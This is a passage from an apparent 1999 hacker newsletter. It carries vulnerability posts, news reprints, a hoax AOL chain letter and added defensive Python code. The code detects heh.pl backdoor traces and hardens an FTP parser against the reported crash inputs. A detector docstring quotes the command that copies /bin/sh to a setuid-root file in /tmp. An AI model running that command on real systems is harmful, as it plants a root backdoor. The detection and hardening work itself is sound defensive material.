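(2) the file names the script uses, (3) processes whose argv[0] names a
daemon while /proc/<pid>/exe still points at an interpreter."""
import os
import stat

WORLD_WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
# File names taken from the script: the shell copy and the pid list.
KNOWN_ARTEFACTS = {".nfsd", "31336.tmp"}
# Executables that normally keep their own name in argv[0]; a script that
# overwrites $0 keeps running under one of these.
INTERPRETERS = {"perl", "python", "ruby", "sh", "bash", "dash", "ksh", "zsh"}


def is_suid_root(mode: int, uid: int) -> bool:
    """True for a regular file owned by root with the setuid bit set, which
    is what `cp /bin/sh /tmp/.nfsd; chmod 4755 /tmp/.nfsd` produces."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def is_known_artefact(name: str) -> bool:
    """True when a directory entry name matches one the script creates."""
    return name in KNOWN_ARTEFACTS


def exe_basename(exe_path: str) -> str:
    """Normalise a /proc/<pid>/exe target: drop the ' (deleted)' marker the
    kernel appends when the binary was unlinked, and a version suffix such
    as perl5.30 -> perl."""
    base = os.path.basename(exe_path.removesuffix(" (deleted)"))
    return base.rstrip("0123456789.")


def argv0_mismatch(cmdline: bytes, exe_path: str) -> bool:
    """True when the executable is an interpreter but argv[0] does not name
    it. heh.pl sets $0 to names such as 'mountme' or 'kflushd'; the kernel
    still reports perl through /proc/<pid>/exe. Login shells ('-bash') are
    excluded by stripping the leading '-'. Treat hits as review candidates:
    legitimate programs that set their own process title will also appear."""
    argv0 = cmdline.split(b"\0", 1)[0].decode(errors="replace").lstrip("-")
    exe = exe_basename(exe_path)
    if exe not in INTERPRETERS:
        return False
    return exe_basename(os.path.basename(argv0)) != exe


def scan_dirs(dirs=WORLD_WRITABLE_DIRS):
    """Report setuid-root regular files and known artefact names."""
    findings = []
    for d in dirs:
        try:
            with os.scandir(d) as entries:
                for e in entries:
                    try:
                        st = e.stat(follow_symlinks=False)
                    except OSError:
                        continue
                    if is_suid_root(st.st_mode, st.st_uid):
                        findings.append((e.path, "setuid-root file in world-writable dir"))
                    if is_known_artefact(e.name):
                        findings.append((e.path, "known heh.pl artefact name"))
        except OSError:
            continue  # directory absent or unreadable
    return findings


def scan_proc(proc="/proc"):
    """Report processes whose argv[0] disguises an interpreter."""
    findings = []
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            exe = os.readlink(f"{proc}/{pid}/exe")
            with open(f"{proc}/{pid}/cmdline", "rb") as f:
                cmdline = f.read()
        except OSError:
            continue  # kernel threads, exited, or not ours to inspect
        if cmdline and argv0_mismatch(cmdline, exe):
            findings.append((int(pid), cmdline.split(b"\0", 1)[0], exe))
    return findings


if __name__ == "__main__":
    for path, why in scan_dirs():
        print(f"{why}: {path}")
    for pid, argv0, exe in scan_proc():
        print(f"pid {pid}: argv[0]={argv0!r} but exe={exe}")
```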
@HWA
30.0 RedHat 6.0 fixes available for some current vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Sun, 16 May 1999 13:01:46 +0200
From: Hugo van der Kooij <hvdkooij@CAIW.NL>
To: BUGTRAQ@netspace.org
Subject: Red Hat Linux 6.0 fixes
Hi,
As Red Hat did not send messages around I will fill in this gap for now.
(Hello Red Hat. Don't get sloppy on this.)
There are a few fixes available for Red Hat Linux 6.0 which can be found
on ftp://updates.redhat.com/6.0/ and these include:
- Newer floppy images for i386.
- newer pump package to fix DHCP anomalies.
- newer xscreensaver package to fix security issues.
- newer apmd package (i386 only)
See also:
http://www.redhat.com/corp/support/errata/rh60-errata-general.html
Hugo.
PS: There is no info about these images on the website. But it just adds
support for the ICP Vortex controller according to the README file
PS/2: There are some typos on the errata pages. It would be nice if these
were fixed as well.
--
Hugo van der Kooij; Oranje Nassaustraat 16; 3155 VJ Maasland
hvdkooij@caiw.nl http://www.caiw.nl/~hvdkooij/
--------------------------------------------------------------
Use of any of my email addresses for unsolicited (commercial)
email is a clear intrusion of my privacy and illegal!
@HWA
31.0 BisonWare FTP server vulnerabilities can lead to root compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 17 May 1999 12:52:02 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Vulnerabilities in BisonWare FTP Server 3.5
Arne Vidstrom submitted the following observations regarding BisonWare
FTP Server 3.5. I contacted the authors of BisonWare and gave them a
copy of Arne's message. After each of Arne's observations I include the
response from BisonWare's Nick Barnes sent back to me.
If you respond to this message, please ensure you're responding to Arne,
Nick, and/or the NTBugtraq list (as opposed to responding to me).
Cheers,
Russ - NTBugtraq Editor
AV=Arne Vidstrom (winnt@BAHNHOF.SE - May 8th, 1999)
NB=Nick Barnes (nick_barnes@compuserve.com - May 16th, 1999)
AV
>Hi everybody,
>
>I've found a few vulnerabilities in BisonWare FTP Server 3.5 (latest
>version). Perhaps they are already known, but here they are:
>
>1) The server doesn't close the old socket from the last PASV command
>when given a new PASV command. Thus, it runs out of buffer space if you
>give lots of PASV commands in a row. Finally, you can't use the server,
>and it consumes lots of memory that isn't released when the client
>disconnects.
NB
>1. Fixed in release 4.1 due out in the next 10 days.
AV
>2) If you log in and give the command "PORT a", and then press Enter
>a few thousand times in a row, the server will crash because it can't
>handle a non-numeric character after PORT and somehow adds all the
>CRLF's to the PORT command in a buffer that seems to overflow.
NB
>2. Fixed in release 4.1
AV
>3) There are buffer overflows for commands that take arguments, for
>example LIST xxxx (1500 characters) and CWD xxx (1500 characters) will
>crash it. This works for the USER command too, so an attacker won't
>need a valid account to crash the server.
NB
>3. Fixed in release 4.1
AV
>4) The account passwords are stored in plaintext in the registry, at
>HKEY_CURRENT_USER\Software\BisonWare\BisonFTP3\Users and are also
>shown when you manage users in the server. They are also added to the
>logs when users log in, depending on how you configure logging. So
>don't put your logs in a directory that can be viewed by FTP users. ;)
NB
>4. Fixed in release 4.1. Passwords will still be stored plain within
>the registry. The registry should only ever be available to the
>administrator, and some large corporate clients use their own software
>to build user lists.
AV
>5) Another point is that after default installation, an anonymous user
>can access everything in your computer because you have to set the
>limitations after installation. You can't really count that as a bug I
>guess, but it's really dangerous anyway... so if you run this server,
>make sure you reconfigure it if you haven't already!!!
NB
>5. This isn't really a bug from our point of view. The whole point is
>to allow FTP operation immediately after install. This is a selling
>advantage over competitive products which require lots of set up before
>you can use them with a client such as your browser.
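The defensive counterpart to the three crash reports above, as an added example in Python (not BisonWare's server code or Arne's test input): a control-channel reader that drops bare CRLFs instead of appending them to the previous command, a parser that refuses over-long arguments and non-numeric PORT values with a 5xx reply, and a session object that closes the previous PASV listener before opening a new one. The length limits, names and loopback listener are this example's own assumptions.

```python
"""Added example (not BisonWare's or Arne's code): an FTP control-channel parser
that refuses the three malformed inputs reported above instead of leaking
sockets, overflowing or crashing. Limits, names and the loopback listener
are this example's own assumptions."""
import re
import socket

MAX_LINE = 4096   # assumed: longest accepted line; an unfinished line past this is dropped
MAX_ARG = 512     # assumed: longest accepted argument; 1500-char LIST/CWD/USER get a 501
PORT_RE = re.compile(r"^(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})$")


class FtpProtocolError(Exception):
    """Carries the 5xx reply the server sends instead of falling over."""


class LineReader:
    """Bounded line accumulator: bare CRLFs are dropped, not glued onto a command."""

    def __init__(self, limit=MAX_LINE):
        self.buf = b""
        self.limit = limit

    def feed(self, data):
        """Append raw bytes; return the complete, non-empty lines now available."""
        lines = []
        self.buf += data
        while b"\r\n" in self.buf:
            line, _, self.buf = self.buf.partition(b"\r\n")
            if line:
                lines.append(line.decode("ascii", "replace"))
        if len(self.buf) > self.limit:
            self.buf = b""
            raise FtpProtocolError("500 Line too long")
        return lines


def parse_command(line):
    """Split one line into (VERB, argument), enforcing both length limits."""
    if len(line) > MAX_LINE:
        raise FtpProtocolError("500 Line too long")
    verb, _, arg = line.strip().partition(" ")
    if not verb.isalpha():
        raise FtpProtocolError("500 Syntax error, command unrecognized")
    if len(arg.strip()) > MAX_ARG:
        raise FtpProtocolError("501 Argument too long")
    return verb.upper(), arg.strip()


def parse_port(arg):
    """Validate h1,h2,h3,h4,p1,p2 strictly; 'PORT a' is rejected, not parsed."""
    match = PORT_RE.match(arg)
    if match is None:
        raise FtpProtocolError("501 Syntax error in PORT argument")
    nums = [int(n) for n in match.groups()]
    if any(n > 255 for n in nums):
        raise FtpProtocolError("501 PORT value out of range")
    return ".".join(str(n) for n in nums[:4]), nums[4] * 256 + nums[5]


class DataChannel:
    """At most one passive listener per session: each PASV closes the last one."""

    def __init__(self):
        self.listener = None

    def pasv(self):
        """Close any earlier listener, open a fresh one, return its port."""
        self.close()
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.bind(("127.0.0.1", 0))   # loopback, ephemeral port: example only
        sock.listen(1)
        self.listener = sock
        return sock.getsockname()[1]

    def close(self):
        if self.listener is not None:
            self.listener.close()
            self.listener = None


def handle_session(raw):
    """Run one constructed control-channel transcript and return the replies.
    An unfinished over-long line propagates as FtpProtocolError."""
    reader, chan, replies = LineReader(), DataChannel(), []
    for line in reader.feed(raw):
        try:
            verb, arg = parse_command(line)
            if verb == "PORT":
                host, port = parse_port(arg)
                replies.append("200 PORT %s:%d" % (host, port))
            elif verb == "PASV":
                replies.append("227 Entering Passive Mode, port %d" % chan.pasv())
            else:
                replies.append("200 %s accepted" % verb)
        except FtpProtocolError as err:
            replies.append(str(err))
    chan.close()
    return replies
```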
@HWA
32.0 Key Escrow revisited (who are the real criminals here??)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Key Escrow Not Just to Bust Criminals Anymore
contributed by Weld Pond
A working document for the Scientific and Technological Options Assessment panel, recently released by the
European Parliament, claims the United States has tried to persuade European Union countries to adopt its key
escrow or key recovery policies. These policies would allow backdoor access to encryption programs. The US
has claimed that this was necessary to read messages exchanged by criminals. The report claims however that
the UKUSA alliance, which includes the United Kingdom, United States, Canada, Australia, and New Zealand, has
used its secret Echelon global spying network to intercept confidential company communications and give
them to favored competitors. The report also claims that the NSA had struck deals with Microsoft, Lotus,
and Netscape to alter their products for foreign use, presumably to make it easier for the NSA to intercept
communications.
C|Net
http://www.techweb.com/wire/story/TWB19990518S0004
Technology News
Report: U.S. Uses Key Escrow To
Steal Secrets
(05/18/99, 9:27 a.m. ET)
By Madeleine Acey, TechWeb
European plans for controlling encryption
software are nothing to do with law
enforcement and everything to do with U.S.
industrial espionage, according to a report
released by the European Parliament on Friday.
The working document for the Scientific and
Technological Options Assessment panel said the United
States has tried to persuade European Union countries to
adopt its key escrow or key recovery policies -- allowing
backdoor access to encryption programs -- saying this
was necessary to read messages exchanged by
criminals.
But the report details how the UKUSA alliance -- made
up of the United Kingdom, United States, Canada,
Australia, and New Zealand -- has used its secret
Echelon global spying network to intercept confidential
company communications and give them to favored
competitors. Thomson S.A., located in Paris, and Airbus
Industrie, based in Blagnac Cedex, France, are said to
have lost contracts as a result of information passed to
rivals.
"The U.S. government misled states in the EU and
[Organization for Economic Cooperation and
Development] about the true intention of its policy," the
report adds.
"Between 1993 and 1997 police representatives were not
involved in the NSA [National Security Agency]-led
policy-making process for key recovery. Despite this,
during the same period the U.S. government repeatedly
presented its policy as being motivated by the stated
needs of law-enforcement agencies."
The document went on to detail how the agencies
specifically studied Internet data. Apart from scanning all
international communications lines -- using 120 satellites,
microwave listening stations, and an adapted submarine
-- it said they stored and analyzed Usenet discussions.
"In the U.K., the Defence Evaluation and Research
Agency maintains a 1-terabyte database containing the
previous 90 days of Usenet messages."
The "NSA employs computer 'bots' (robots) to collect
data of interest," the report adds. "For example, a New
York website known as JYA.COM offers extensive
information on cryptography and government
communications interception activities. Records of
access to the site show that every morning it is visited by
a bot from NSA's National Computer Security Center,
which looks for new files and makes copies of any that it
finds."
According to a former employee, NSA had by 1995
installed "sniffer" software to collect traffic at nine major
Internet exchange points.
The report offered evidence that a leading U.S. Internet
and telecommunications company had contracted with
the NSA to develop software to capture Internet data of
interest, and that deals had been struck with Microsoft,
Lotus, and Netscape to alter their products for foreign
use.
"There can't be any doubt any longer that there's an
economic imperative to these policies," said Simon
Davies, director of Privacy International. "We have been
lied to for years. But it will be up to companies like
Airbus to take legal action to force a definition of national
security in the context of the European Union. Then we
can establish a legal framework and appeals process."
Meanwhile, the Financial Times reported on Monday
that the U.K. government had agreed to take key escrow
"off the agenda" and had accepted industry proposals for
a "largely voluntary program of co-operation with the
security services".
Government officials could not confirm the report.
But Caspar Bowden, director of the Foundation for
Information Policy Research, questioned how far any
compromise would go. "Will they persist with statutory
licensing [of trusted third parties]and criminal legislation
on decryption warrants?" he asked.
Andrew Dornan of Data Communications
International contributed to this report.
@HWA
33.0 AOL Under Siege by Hackers, NOT!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by wariac
Print and online media are bad enough but television
'news' has got to be the worst information source on
the planet. The local CBS affiliate in Tucson Arizona,
KOLD, ran a lead story on its 10pm "news-cast" last
week that claimed that 'hackers' had invaded AOL and
were threatening to distribute the personal information
of its users. Unless of course that user forwarded an
email to 10 other users within 45 minutes. KOLD aired
this "news" without confirmation, without contacting an
independent third party, without even getting an official
response from AOL. All they had was the copy of an
email from someone who wasn't even a user of AOL!
This email was evidently enough to run a several minute
segment as the lead story and scare the hell out of
several thousand viewers in the Tucson area. And
people wonder why Joe Schmoe is afraid of the Internet.
Star Net Dispatches
http://dispatches.azstarnet.com/joe/1999/0518-926992417.htm
Hacking the boob tube
By Joe Salkowski
StarNet Dispatches
Tue May 18 00:23:01 1999
Head for the hills, everyone: A "hacker group" is
conspiring to "create problems in your personal
life."
At least, that's the word from the crack
investigative reporters at KOLD, Channel 13,
Tucson's CBS television affiliate. The station that
patrols Tucson's skies in its very own rent-to-own
helicopter led its 10 p.m. "news"-cast last
Wednesday with a threatening Internet story that
apparently escaped the attention of lesser,
ground-hugging journalists.
"They say they have your personal information,
including credit card numbers and Social Security
numbers," anchor Chris Pickel warned in her most
ominous tone. "And unless you do as they say,
they're going to use it against you."
Co-anchor Randy Garsee went on to explain that a
"hacker group" was sending out e-mail messages
threatening to divulge personal information from
recipients' America Online accounts unless they
forwarded the message to 10 AOL users within 45
minutes. The report, accompanied by a
grammatically challenged "You Got Mail" graphic,
was delivered with the breathless rush of a
Lewinsky-level scoop.
"Does AOL know about this?" Garsee asked
reporter Valerie Cavazos. "Well," she responded
with barely suppressed glee, "they do now."
Indeed. They know, like most Net users should,
that KOLD fell hard for one of the oldest, lamest
tricks on the Net.
The menacing message that consumed three
minutes of supposedly precious airtime was nothing
more than a chain letter - the sort that promises ten
years of bad luck will befall those who don't send it
along. No "hacker group" or anyone else could
carry out the threats contained in the message, and
nobody who knew anything about the Net would
pass it along.
But KOLD didn't think twice - or even once -
before passing the threats along to a few thousand
viewers.
"This is not as thorough as we probably could have
been," KOLD News Director Carolyn Kane
conceded the next day. "Our follow up will say that
the only way to get yourself in trouble is to fall for
this letter."
The story began when Chris Lamb, a 40-year-old
warehouse manager for a local pet supply
company, phoned KOLD Wednesday to ask about
the e-mail message he'd just received from a
friend. "I called just to see if they had heard
anything about it," he said. "I didn't realize what
would happen then."
Lamb, who admits he's "not the most
computer-literate person," said he wasn't sure the
message was authentic. "That's kind of what I
mentioned to Channel 13," he said. "But they said
they wanted to do the story."
AOL's main office in Virginia was closed by the
time Cavazos got the story, Kane said. So the
reporter talked to someone at AOL's local
telephone support center who didn't know anything
about the message or its claims. Instead of waiting
until the next day for an intelligent response from
AOL, Cavazos and her editors decided to air her
story that night.
"AOL says that this is the first time that they've
heard about it and are now frantically trying to
figure out if this was a prank or if the hacker group
did indeed figure out a way to get into sensitive
AOL files," Cavazos reported. She used the word
"frantically" again later in her report, suggesting
she had a telepathic grasp of happenings inside
AOL's headquarters - which were, you'll
remember, closed for the night.
Cavazos offered some details from the letter,
including its threat that recipients' AOL account
would be "messed around with." She also hinted
that a "hacker group" could indeed have "cracked"
the password to AOL's secret files, a point she
illustrated by displaying a Web site with
black-market copies of consumer software
programs.
Had she instead displayed a clown painting on
black velvet, it would have been equally relevant.
The fact that consumer software can be "cracked"
doesn't prove that a "hacker group" could access
the entirety of AOL's account information by
figuring out a single password, as the message
claimed could be done.
That feat is, in fact, impossible, AOL spokesman
Rich D'Amato told me the next day. While he
wouldn't divulge
how AOL secures that data, he
said it wasn't sitting behind a single password on a
public Web server. "That's a safe assumption," he
said.
"If someone says they have all your personal
information, you should react to that the same way
you would in real life," D'Amato said. "Take a
moment think about it. Don't knee-jerk react to it."
But there wasn't much thinking going on at KOLD
last Wednesday. In fact, it didn't even bother
Cavazos that Lamb, the lone on-camera source of
her story, isn't an AOL subscriber - meaning he
couldn't possibly have been affected by the threats.
Viewers learned this only when Garsee asked
Cavazos after her report if Lamb obeyed the
commands in the message and what happened if
he didn't. "He doesn't know that. Nothing has
happened so far. Um, he actually was not an AOL
user," she stammered. "So it hasn't affected his
AOL program."
So let's get this straight: KOLD led its newscast
with a story about a "hacker group" that doesn't
exist sending threats that couldn't possibly be
carried out to a person who couldn't have been
harmed - all after an announcer promised that "For
accurate, concise reporting, watch News 13." (For
television news reporters who might be reading this
story, I'll explain that this qualifies as irony.)
When I called Kane, the news director, she began
our conversation by defending the story. "We were
just saying this is a letter that people had gotten.
Valerie did it from that point of view," she said.
Later, though, she conceded that her station should
have held off on the story. "We really should have
had whatever AOL says it was," she said. "That's
why I'm insisting we make sure we follow this up."
The next night, KOLD's 10 p.m. news included a
30-second segment informing viewers that the
message was a hoax. But just to be safe, the
anchor advised, don't open e-mail sent from people
you don't know.
Say what?
Oh, never mind.
If you ever wonder why ordinary, TV-watchin'
folk are so afraid of what they might find on the
Internet, this comedy of errors should explain
things quite nicely. While many reporters have
wised up to the realities of the Net, the talking
heads of local television news must have been
busy fixing their makeup.
Since most local television news reporters are
assigned to cover a wide variety of subjects, they
aren't likely to become experts in any one of them.
But it shouldn't be too much to ask that they apply
a little common sense and basic reporting skills
before airing stories that ultimately mislead and
confuse their unfortunate audience.
Kane told me her news team would have more
Internet related stories in the near future, but I'm
not sure I can bear to watch. Before they do
another story about the Net, they really ought to
dip into their helicopter budget and purchase a
clue.
Text of "hacker" e-mail (WARNING:
Contains profanity)
Your Screen Name has Been Added to the
ß(r)øöô¥ £ Hackers List!
Here is how we work. Because we master AOL
everytime this letter is sent out a copy is also
instantly send to us. We then scan out all the
names, and place them on our hackers list. Once
you send out this letter 10 times your name again
is instantly removed from our list. If this letter is
not sent out exactly 45 minutes after you have
opened it your name will not be able to be
removed from our hacking list. Here is what
happened when your name is stuck on the
ß(r)øöô¥ £ hackers list.
-Your AOL password is pulled out of AOL's
files. Stupidly AOL stores your password on a
password access website. We have cracked the
password needed and have access to every
account except for AOL guides (cat guides).
-We gain your credit card number, social security
number, and home address. Your credit card
information and home address is stored at the
AOL site and with that we can gain you social
security number.
-Everytime you sign on AOL your account will
be messed around with.
-and much, much more with the power of
ß(r)øöô¥ £ hackers.
Don't believe this? We don't care at all because
not following the directions given will harm you in
over 10 ways. All you have to do is send this out
to 10 people and you will never have to worry
about this again. If you receive this letter again
after sending it out you don't need to send it out
again, because your name is not able to be put
back on.
Why are we doing this? It is to get back at AOL,
and we are taking action. When the members of
ß(r)øöô¥ £ hackers first signed up for AOL
they were not hackers. Once they had to start
paying 21 dollars for AOL they decided to fuck
over AOL. Also the ß(r)øöô¥ £ hackers are
doing this because of the many ads on AOL.
When you first sign on AOL you receive too
many ads and shit when you go to AOL
channels, and more pop ads when you click on
things. We have had enough! That's why
ß(r)øöô¥ £ exists. All you must do now is send
this to 10 other AOL members and you will
never again have to worry about ß(r)øöô¥ £
hackers.
SEND THIS OUT NOW TO 10 PEOPLE IF
YOU WANT TO SAVE YOUR ACCOUNT,
CREDIT CARD, AND MUCH MORE!
@HWA
34.0 Unknown spammer gets sued
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
FTC Sues Unknown Spammer "Anyway"
contributed by webmaster
The Federal Trade Commission has announced that it has filed a suit in the U.S. District Court in Charlotte
against an unknown defendant. The individual, who is unknown at this time is accused of sending spam as
part of a telemarketing scam. The FTC predicts that they will have enough information to name a suspect
within a few days. A choice quote from the article, "Anonymity doesn't necessarily stand in the way of
some kind of law enforcement," said Eileen Harrington, the FTC's associate director of marketing practices.
"We sued them anyway." Pretty soon we'll have them suing "unknown hackers" for million dollar damages. Oh,
wait that already is happening isn't it?
ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/spamscam990518.html
Spam Scam Creator Sued
Junk E-Mail Prompts Consumer Calls Overseas
By Kalpana Srinivasan
The Associated Press
W A S H I N G T O N, May 18 - Clifton Taylor's 12-year-old grandson was doing his homework
on the Internet when he received an e-mail message saying his order for a purchase had
been processed and $375 would be billed to his credit card in the next two days.
To cancel the order that he had never placed,
the 7th-grader was supposed to call the number on the screen immediately. But instead of
a consumer representative, on the other end was a pornographic recording from a site in the West
Indies. The international toll call popped up on the family's phone bill shortly after.
"This approach was so different it caught us by surprise," said Taylor, a retired school teacher living
outside of Charlotte, N.C.
The scheme - a combination of spamming, or junk e-mail, and telemarketing fraud - has already prompted
20,000 consumers to complain to America Online.
Suit Filed Against Scam Mastermind
The Federal Trade Commission today was announcing a suit filed in U.S. District Court in Charlotte against the
unknown defendant who masterminded the scam. The agency says this action - the first taken against an
unnamed perpetrator - is a warning to con artists who try to hide behind the vast, faceless Internet.
"Anonymity doesn't necessarily stand in the way of some kind of law enforcement," said Eileen Harrington,
the FTC's associate director of marketing practices. "We sued them anyway."
Harrington predicts the commission will have enough information to name a defendant in a few days. In the
meantime, the court order has blocked the flow of money from American telephone carriers to the foreign telephone
company that pays the operators of the hotline.
Breaking Through Forged Addresses
The case highlights some of the inherent challenges in tracking down and stopping the senders of junk e-mail,
also known as spam. A common tactic among con artists sending spam, including those cited in today's action, is to
use a variety of forged e-mail addresses so they cannot be reached.
Ray Everett-Church, co-founder of the Coalition Against Unsolicited Commercial E-Mail, likens the
problem to the arcade game "whack-a-mole": no sooner does the mole get hit by the mallet in one place, than it
pops up quickly in another.
"Spammers rapidly move from sending site to sending site," said Everett-Church. That makes it futile for a
server provider to block one specific e-mail address. But, he added, companies can block e-mails based on their
content, for example filtering out all messages that contain a particular word or telephone number.
"The problem comes in finding similarities you can block," he said.
FTC Creating a Spammer DB
The FTC says it is raising the ante against fraud with its own technology. More than a year ago, the commission
began collecting spam forwarded to it by consumers, creating a database with hundreds of thousands of
messages in it.
The commission first learned of the scheme after a consumer submitted an online complaint form - one of
about 10,000 the FTC receives each week. Using the information provided by the consumer, the FTC ran a
database search and came up with dozens of matches containing the same telephone number.
"This technology has given us an enormous leg up against scams that use technology," said Harrington. The
agency was able to pull together a case in a few weeks.
AOL Cooperated With FTC
AOL has a similar mechanism for receiving forwarded junk e-mail. The company has passed on its complaints
about the scam in question, plus copies of the actual spam to the FTC, said Rich D'Amato, a spokesman for Dulles,
Va.-based AOL.
The FTC has asked the court for the money already paid by customers to their telephone companies for the
toll charges to be put aside for consumer restitution and for the company to be barred from violating the law
through its deceptive messages.
A successful case against the perpetrators would come as vindication to Taylor. He contacted a litany of people
from his phone company to members of Congress to local police to report the matter. Most rebuffed him because he
didn't have enough follow-up information for them to pursue a case.
While he was furious about the e-mail, Taylor said his anger got worse because "I couldn't get anywhere with
anybody. The whole thing just completely rubbed me the wrong way."
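The matching the article describes, as an added example in Python (not the FTC's or AOL's own tooling): forwarded reports are keyed on the telephone number in the body rather than on the forged sender address, so one number surfaces across many sending sites, and the same normalised number can be turned into the content filter Everett-Church mentions. The reports, sender addresses and numbers are constructed for this example.

```python
"""Added example (not the FTC's or AOL's own tooling): match forwarded spam
reports on the telephone number in the body rather than on the sender
address, the way the database search described above found dozens of
messages sharing one number despite forged From: lines. The reports and
numbers below are constructed for this example."""
import re
from collections import defaultdict

# A North American number written with any common punctuation, optionally prefixed by 1.
PHONE_RE = re.compile(
    r"(?<!\d)(?:\+?1[\s.-]*)?\(?\d{3}\)?[\s.-]*\d{3}[\s.-]*\d{4}(?!\d)")

# Constructed reports: four forged senders, one shared number, plus one benign mail.
SAMPLE_REPORTS = [
    {"id": 1, "from": "billing@orders.example",
     "body": "Your order was processed and $375 will be billed to your card in "
             "two days. To cancel, call 1-809-555-0199 immediately."},
    {"id": 2, "from": "confirm77@mail.example",
     "body": "ORDER CONFIRMATION. Cancel at (809) 555-0199 within 48 hours."},
    {"id": 3, "from": "noreply@shop.example",
     "body": "Purchase accepted. Questions? 809.555.0199"},
    {"id": 4, "from": "newsletter@legit.example",
     "body": "Thanks for subscribing. Our office line is 202-555-0133."},
    {"id": 5, "from": "x9q@relay.example",
     "body": "Charge pending; call 1 809 555 0199 now to stop it."},
]


def extract_numbers(text):
    """Return the set of 10-digit numbers in text, normalised to digits only."""
    found = set()
    for match in PHONE_RE.finditer(text):
        digits = re.sub(r"\D", "", match.group(0))
        if len(digits) == 11 and digits.startswith("1"):
            digits = digits[1:]
        if len(digits) == 10:
            found.add(digits)
    return found


def cluster_by_number(reports, min_reports=2):
    """Group reports by the number they carry; keep numbers seen in at least
    min_reports messages, together with the distinct (possibly forged) senders."""
    by_number = defaultdict(list)
    for report in reports:
        for number in extract_numbers(report["body"]):
            by_number[number].append(report)
    return {
        number: {"reports": [r["id"] for r in hits],
                 "senders": sorted({r["from"] for r in hits})}
        for number, hits in by_number.items() if len(hits) >= min_reports
    }


def block_rule(number):
    """Compile the content filter the article mentions: match this number
    however it is punctuated, so moving to a new sending site does not help."""
    sep = r"[\s.()-]*"
    return re.compile(r"(?<!\d)(?:\+?1)?" + sep + sep.join(
        (number[:3], number[3:6], number[6:])) + r"(?!\d)")


if __name__ == "__main__":
    for number, info in cluster_by_number(SAMPLE_REPORTS).items():
        print(number, info)
```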
@HWA
35.0 German Police Crack Down On Internet Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/ May 19th
Germans Go After Inet Crime
contributed by Y0han
German officials are hoping to contain the spread of politically extreme matter or child pornography over the
Internet. Deputy Interior Minister Claus Henning Schapper recently announced that German police are
developing an Internet search engine that will zero in on illegal activity on the Web such as pedophile networks
and neo-Nazi propaganda.
Yahoo News
http://biz.yahoo.com/rf/990517/i7.html
Monday May 17, 7:44 am Eastern Time
German police develop Internet crime-buster
BONN, May 17 (Reuters) - German police are developing an Internet search engine that will home in on illegal
activity on the Web, including paedophile networks and neo-Nazi propaganda, and lead detectives to those who
publish or even view such sites, an official said on Monday.
``It should make it easier for the police to pinpoint criminal content on the Internet, secure evidence and
identify the senders and addressees,'' Deputy Interior Minister Claus Henning Schapper told a conference on
Internet security in Bonn.
``Using it, we want to contain the spread of, for example, politically extreme matter or, highly important,
child pornography over the Internet.''
He gave no further details of the device nor did he say when it might come into operation.
@HWA
36.0 After a rather long hiatus BoW resurfaces and releases issue #9
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Brotherhood Of Warez was/is an ezine that takes a pisstake approach to the scene and has climbed up
from the mire to produce #9 of their series of ezines, numbers 1 thru 8 were released in 1992-1994...
From HNN http://www.hackernews.com/
BoW 9 Is Here!
contributed by Velkro Kode Warrior
BoW Magazine, an electronic ezine started in 1992 as a reaction to the degradation of the so-called "H/P scene"
that was around at the time, has after a five year hiatus released its ninth issue. Eight issues of BoW were
released from 1992-1994, and now BoW magazine is back with a much overdue ninth issue.
BoW #9
http://www.velkro.net./
The Press release;
KRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWAREZKRADWARE
...:::||| OFFICIAL PRESS RELEASE |||:::...
__________ __ .__ .__ .___
\______ \_______ _____/ |_| |__ ___________| |__ ____ ____ __| _/
| | _/\_ __ \/ _ \ __\ | \_/ __ \_ __ \ | \ / _ \ / _ \ / __ |
| | \ | | \( <_> ) | | Y \ ___/| | \/ Y ( <_> | <_> ) /_/ |
|______ / |__| \____/|__| |___| /\___ >__| |___| /\____/ \____/\____ |
\/ \/ \/ \/ \/
_____ __ __
____ / ____\ / \ / \_____ _______ ____ ________
/ _ \ __\ \ \/\/ /\__ \\_ __ \_/ __ \\___ /
( <_> ) | \ / / __ \| | \/\ ___/ / /
\____/|__| \__/\ / (____ /__| \___ >_____ \
\/ \/ \/ \/
K-R4D FOR THE AYCH-PEE NAT10N
KICKIN IT IN 1999
-**=< BoW Ann0unc3Zz Issu3 N1n3!@#$ >=**-
PHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOWPHEARBOW
Th4tz r1ght f0lkZz! BoW numb3r n1ne is in the works. The p3ople th4t brought you
th3 ever-pheared .rhosts exploit and the exclusive D4l3 dr3w g3rbling photos are
str1king b4ck in 1999 w1th m4d T4e-BoW sk1llz.
-**=< FuCk St4r W4rs -- R34d BoW!@%#$ >=**-
Wh3n M4y 19th r0llz 4r0und, 4nd y0u k4nt g3t 1n t0 s3e St4r W4rs, just s1t b4ck,
r3l4x, s4y "Fuck 1t!@#," 4nd gr4b 4 c0py 0f BoW 9.
The Numb3r n1ne is a v3ry important number to the 1nner sanktum of BoW. NiNE is
the number th4t always returns unto its3lf. Take a look:
9 x 31337 = 282033
2 + 8 + 2 + 0 + 3 + 3 = 18
1 + 8 = 9 < -- try this with
*your* favorite number
